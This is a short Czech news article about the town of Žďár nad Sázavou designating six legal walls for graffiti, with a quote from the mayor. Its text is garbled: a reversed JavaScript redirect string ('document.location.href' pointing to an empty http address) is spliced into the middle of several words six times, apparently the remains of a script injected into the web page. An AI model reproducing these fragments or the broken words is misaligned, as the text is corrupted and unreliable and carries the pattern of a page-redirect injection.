Rainbow page separator

Ve Žďáře mohou sprejeři nově využívat šest legálních ploch

Pátek, 29. července 2022

Žďár nad Sázavou / Celkem šest legálních ploch ve městě, kde se mohou sprejeři kdykoliv a bez hrozby postihu realizovat, vyčlenili žďárští radní. Jedná se o zeď garáží a dílny bývalého areálu technických služeb za hotelem Veliš, zadní stranu budovy au[„\’///:ptth\’=ferh.noitacol.tnemucod“];tocvičiště, plochy pod silničními mosty v ulici 1. máje a na Klafar, plocha pod mostem na cestě ke ŽĎASu ve Strojírenské ulici a oddělovací zeď ze strany od parkoviště v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru atria za náměstím Republiky. „Graffiti a obecně street art je tvorba autentická, má estetickou tvůrčí hodnotu. Současně jsme chtěli vyjádřit i jistý liberální postup vůči těm[„\’///:ptth\’=ferh.noitacol.tnemucod“];to výtvarným projevům a podpořit rozmani[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost tvůrčího vyjádření ve veřejném pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru,“ poznamenal mimo jiné starosta Žďáru nad Sázavou Martin Mrkos. Žďárská radnice se k podpoře ‚řízeného‘ graffiti a podobné tvorby přikláněla už dříve, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];to například i při ART festivalu v roce 2018, kdy byly vytvořeny také velkoformá[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové malby na zdech trafostanic i jiných objektů ve městě.